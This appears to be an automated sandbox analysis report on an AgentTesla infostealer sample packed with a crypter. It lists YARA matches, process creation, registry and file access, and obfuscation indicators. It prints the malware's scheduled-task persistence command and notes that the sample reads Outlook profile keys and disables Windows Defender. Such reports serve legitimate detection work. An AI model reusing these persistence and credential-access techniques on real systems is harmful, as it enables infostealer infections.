              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              .NET source code contains very large array initializations
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB0063866u002d9900u002d46A9u002dBAF8u002dC30A0EC83145u007d/u00340AC4BAEu002d6FADu002d49F9u002dADA9u002d9C669FAB2230.csLarge array initialization: .cctor: array initializer size 10995
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 12.2.nrQtAokXKaSn.exe.2b4ba4c.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 0_2_029EC6240_2_029EC624
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 0_2_029EE9180_2_029EE918
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 0_2_029EE9080_2_029EE908
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_02C5FC1811_2_02C5FC18
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_02C56D4011_2_02C56D40
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692F2E811_2_0692F2E8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692910011_2_06929100
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692AEE811_2_0692AEE8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_0692E97C11_2_0692E97C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeCode function: 11_2_069225F811_2_069225F8
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.345081208.00000000073D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.327264541.0000000003EB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000000.257511638.0000000000762000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000000.315508703.0000000000438000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.524125934.0000000000CF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeBinary or memory string: OriginalFilenamevaoPXhU.exeH vs SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: nrQtAokXKaSn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeReversingLabs: Detection: 31%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeJump to behavior
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmpJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe {path}Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmpJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}Jump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeProcess created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile created: C:\Users\user\AppData\Local\Temp\tmp152E.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/5@8/3
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538141931.0000000002F45000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.538732210.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_01
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeMutant created: \Sessions\1\BaseNamedObjects\OGrkiBVSf
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csCryptographic APIs: 'CreateDecryptor'
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: vaoPXhU.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, nrQtAokXKaSn.exe.0.dr

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs.Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs.Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs.Net Code: j7QkTWEuuxfsufhdJqx System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
              Source: initial sampleStatic PE information: section name: .text entropy: 7.457613017086461
              Source: initial sampleStatic PE information: section name: .text entropy: 7.457613017086461
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csHigh entropy of concatenated method names: '.cctor', 'ILvBvLsgDaWEH', 'gdMh44R7dy', 'mpWhJ0DwjU', 'I23hLHMKEG', 'nVyhZqdKfw', 'r9ThKqgi8D', 'x6BhnVXs0E', 'GXYhOjn8mG', 'Ba9hAJKArV'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/RF0rtnYZvHqeZZQmad.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'rbWCBAlkmD', 'BYrhkD7lnt', 'bOUhrVkeY6', 'rZth64JWqh', 'N1GhBhq1bd', 'mnhhuai7hm', 'gVbhX8SHDY', 'UWJhWdhBPe'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/xofaJsuXhoEZWIMVbx.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'w6KW6iuZ3C', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/XpgD7ix0Tc2tXfIVtE.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'A9mWBY6is4', 'K5fh3tNoBD', 'fvIhI4MtSm', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/M8y7RpwCvSV1iRZqGt.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'QckoesBIdE', 'BYrhkD7lnt', 'bOUhrVkeY6', 'XI8K8cJrgK', 'S0hKo16Hd2', 'C9aKGlyMn6', 'fcaKncAJlR', 'eT6KQo5CBm'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/cXSiYCEvRKO91GCE3S.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'dvGHDFjM1', 'rKJjTGMbWD', 'rtAjgVCNjh', 'QIojZhSlWt', 'I2FjEbEZoE', 'W1XjeaB1IA', 'uxEjRiIBJO', 'DfojfkBBD7'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/gCYF5Hms6cLTc6i3Fq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'RbA1O63flB', 'K5fh3tNoBD', 'fvIhI4MtSm', 'yg4Kqobx5C', 'i4FKYmCy6E', 'KGE0bkLocg', 'YqN0dC3xxO', 'RmDK3s2RXH'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/V89IOPlyboSofKxcqg.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'lyv1I26HJ3', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'KrF0u61N2j', 'Ci10X3KiGR', 'tch00UKtac', 'd8J0NeP2MA', 'raI0hq4ftb'
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.csHigh entropy of concatenated method names: '.ctor', 'bKRCCtDOmB', 'yYxCWkcsU3', 'h8PComFFyA', 'fLyC1NFYFr', 'g1YChkUc4o', 'PPdCsTsGs3', 'kPmCEjukFe', 'Dispose', 'lNECD1q2WL'
